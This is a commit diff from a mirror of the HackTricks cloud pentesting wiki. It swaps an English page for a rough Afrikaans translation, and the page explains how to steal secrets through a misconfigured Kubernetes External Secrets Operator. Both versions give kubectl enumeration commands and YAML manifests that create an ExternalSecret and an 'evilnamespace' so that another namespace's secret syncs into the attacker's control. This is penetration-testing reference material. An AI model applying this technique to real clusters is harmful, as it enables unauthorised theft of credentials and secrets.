gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-27 07:14:20 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['.github/pull_request_template.md', 'src/pentesting-cloud/az

Browse Source
This commit is contained in:
Translator
2024-12-31 19:02:02 +00:00
parent 7770a50092
commit 2753c75e8b
244 changed files with 8471 additions and 11302 deletions
Download Patch File Download Diff File Expand all files Collapse all files

122
src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
View File

@@ -1,113 +1,101 @@
# External Secret Operator
**The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
**Die oorspronklike skrywer van hierdie bladsy is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
This page gives some pointers onto how you can achieve to steal secrets from a misconfigured ESO or application which uses ESO to sync its secrets.
Hierdie bladsy gee 'n paar wenke oor hoe jy kan steel van geheime uit 'n verkeerd geconfigureerde ESO of toepassing wat ESO gebruik om sy geheime te sinkroniseer.
## Disclaimer
The technique showed below can only work when certain circumstances are met. For instance, it depends on the requirements needed to allow a secret to be synched on a namespace that you own / compromised. You need to figure it out by yourself.
Die tegniek wat hieronder getoon word, kan slegs werk wanneer sekere omstandighede nagekom word. Byvoorbeeld, dit hang af van die vereistes wat nodig is om 'n geheim te laat sinkroniseer op 'n naamruimte wat jy besit / gecompromitteer het. Jy moet dit self uitfigure.
## Prerequisites
1. A foothold in a kubernetes / openshift cluster with admin privileges on a namespace
2. Read access on at least ExternalSecret at cluster level
3. Figure out if there are any required labels / annotations or group membership needed which allows ESO to sync your secret. If you're lucky, you can freely steal any defined secret.
1. 'n Voet in 'n kubernetes / openshift-kluster met admin regte op 'n naamruimte
2. Lees toegang op ten minste ExternalSecret op kluster vlak
3. Figurer uit of daar enige vereiste etikette / annotasies of groepslidmaatskap nodig is wat ESO toelaat om jou geheim te sinkroniseer. As jy gelukkig is, kan jy enige gedefinieerde geheim vryelik steel.
### Gathering information about existing ClusterSecretStore
Assuming that you have a users which has enough rights to read this resource; start by first listing existing _**ClusterSecretStores**_.
Aneem dat jy 'n gebruiker het wat genoeg regte het om hierdie hulpbron te lees; begin eers deur bestaande _**ClusterSecretStores**_ op te lys.
```sh
kubectl get ClusterSecretStore
```
### ExternalSecret enumerasie
### ExternalSecret enumeration
Let's assume you found a ClusterSecretStore named _**mystore**_. Continue by enumerating its associated externalsecret.
Kom ons neem aan jy het 'n ClusterSecretStore met die naam _**mystore**_ gevind. Gaan voort deur sy geassosieerde externalsecret te enumerate.
```sh
kubectl get externalsecret -A | grep mystore
```
_Hierdie hulpbron is naamruimte-geskepte, so tensy jy reeds weet watter naamruimte om te soek, voeg die -A opsie by om oor alle naamruimtes te kyk._
_This resource is namespace scoped so unless you already know which namespace to look for, add the -A option to look across all namespaces._
You should get a list of defined externalsecret. Let's assume you found an externalsecret object called _**mysecret**_ defined and used by namespace _**mynamespace**_. Gather a bit more information about what kind of secret it holds.
Jy behoort 'n lys van gedefinieerde externalsecret te kry. Kom ons neem aan jy het 'n externalsecret objek genaamd _**mysecret**_ gevind wat gedefinieer en gebruik word deur naamruimte _**mynamespace**_. Versamel 'n bietjie meer inligting oor watter soort geheim dit hou.
```sh
kubectl get externalsecret myexternalsecret -n mynamespace -o yaml
```
### Assembling the pieces
From here you can get the name of one or multiple secret names (such as defined in the Secret resource). You will an output similar to:
Van hier af kan jy die naam van een of meer geheime name kry (soos gedefinieer in die Secret hulpbron). Jy sal 'n uitvoer kry wat soortgelyk is aan:
```yaml
kind: ExternalSecret
metadata:
annotations:
...
labels:
...
annotations:
...
labels:
...
spec:
data:
- remoteRef:
conversionStrategy: Default
decodingStrategy: None
key: SECRET_KEY
secretKey: SOME_PASSWORD
...
data:
- remoteRef:
conversionStrategy: Default
decodingStrategy: None
key: SECRET_KEY
secretKey: SOME_PASSWORD
...
```
So ver het ons:
So far we got:
- Name a ClusterSecretStore
- Name of an ExternalSecret
- Name of the secret
Now that we have everything we need, you can create an ExternalSecret (and eventually patch/create a new Namespace to comply with prerequisites needed to get your new secret synced ):
- Naam 'n ClusterSecretStore
- Naam van 'n ExternalSecret
- Naam van die geheim
Nou dat ons alles het wat ons nodig het, kan jy 'n ExternalSecret skep (en uiteindelik 'n nuwe Namespace patch/create om te voldoen aan die vereistes wat nodig is om jou nuwe geheim gesinkroniseer te kry):
```yaml
kind: ExternalSecret
metadata:
name: myexternalsecret
namespace: evilnamespace
name: myexternalsecret
namespace: evilnamespace
spec:
data:
- remoteRef:
conversionStrategy: Default
decodingStrategy: None
key: SECRET_KEY
secretKey: SOME_PASSWORD
refreshInterval: 30s
secretStoreRef:
kind: ClusterSecretStore
name: mystore
target:
creationPolicy: Owner
deletionPolicy: Retain
name: leaked_secret
data:
- remoteRef:
conversionStrategy: Default
decodingStrategy: None
key: SECRET_KEY
secretKey: SOME_PASSWORD
refreshInterval: 30s
secretStoreRef:
kind: ClusterSecretStore
name: mystore
target:
creationPolicy: Owner
deletionPolicy: Retain
name: leaked_secret
```
```yaml
kind: Namespace
metadata:
annotations:
required_annotation: value
other_required_annotation: other_value
labels:
required_label: somevalue
other_required_label: someothervalue
name: evilnamespace
annotations:
required_annotation: value
other_required_annotation: other_value
labels:
required_label: somevalue
other_required_label: someothervalue
name: evilnamespace
```
After a few mins, if sync conditions were met, you should be able to view the leaked secret inside your namespace
Na 'n paar minute, as sink toestande nagekom is, behoort jy die gelekte geheim binne jou naamruimte te kan sien.
```sh
kubectl get secret leaked_secret -o yaml
```
## References
## Verwysings
{{#ref}}
https://external-secrets.io/latest/
@@ -116,7 +104,3 @@ https://external-secrets.io/latest/
{{#ref}}
https://github.com/external-secrets/external-secrets
{{#endref}}